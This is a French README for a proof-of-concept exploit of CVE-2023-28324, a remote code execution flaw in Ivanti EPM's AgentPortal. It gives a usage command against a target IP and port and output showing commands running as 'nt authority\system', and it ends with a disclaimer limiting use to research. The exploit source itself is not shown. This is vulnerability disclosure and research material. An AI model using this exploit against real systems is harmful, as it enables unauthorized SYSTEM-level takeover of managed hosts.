
Ivanti EPM AgentPortal RCE Vulnerability
POC pour CVE-2023-28324 affectant Ivanti EPM.
Une analyse technique de la cause racine de la vulnérabilité peut être trouvée sur notre blog : https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
Ce POC exploite une vulnérabilité dans AgentPortal.exe pour exécuter des commandes arbitraires. Pour que ce POC fonctionne, vous devez fournir vos propres références à AgentPortal.exe et APCommon.dll provenant d'une installation Ivanti EPM.
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
Ce logiciel a été créé purement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.